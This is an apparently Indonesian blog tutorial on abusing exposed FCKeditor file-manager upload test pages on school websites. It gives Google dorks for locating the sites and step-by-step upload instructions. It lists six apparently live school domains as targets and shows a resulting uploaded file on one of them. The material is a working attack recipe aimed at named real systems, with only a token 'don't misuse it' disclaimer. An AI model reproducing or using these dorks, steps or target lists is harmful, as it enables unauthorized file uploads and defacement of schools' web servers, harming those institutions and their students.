TUTOR :
1. Siapkan file txt di desain yah..:D.
2. Dork:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
3. Exploit: /editor/filemanager/connectors/test.html
/editor/filemanager/connectors/uploadtest.html
*Pakai salah satu Exploitnya*
EX:
http://xxx.sch.id/html/siswa.php
http://xxx.sch.id/html/almni.php
http://xxx.sch.id/html/guru.php
*Sesuai Dork.
Ganti jadi:
http://xxxx.sch.id/editor/filemanager/connectors/uploadtest.html
4. Ganti ASP jadi PHP.
5. Browse file txt yang sudah disiapkan -> open -> upload.
6. Hasilnya: http://xxx.sch.id/userfiles/file/nama-file.txt
live target :
http://sdia20.sch.id/simk/atk/attributes/fck/editor/filemanager/connectors/test.html
http://www.e-learning.smpbatikska.sch.id/editor/filemanager/connectors/test.html
http://sman1kotabaru.sch.id/editor/filemanager/connectors/test.html
http://smansa-pringsewu.sch.id/editor/filemanager/connectors/test.html
http://www.smkn1kuta.sch.id/editor/filemanager/connectors/test.html
http://smp1ponjong.sch.id/editor/filemanager/connectors/test.html
Sekian Tutorial dari saya jangan di salah gunakan bro .. . . !!!!
Hasilnya :
http://www.sman1kotabaru.sch.id/userfiles/datasiswa.txt
Gan gue bingung..??? -_-
BalasHapus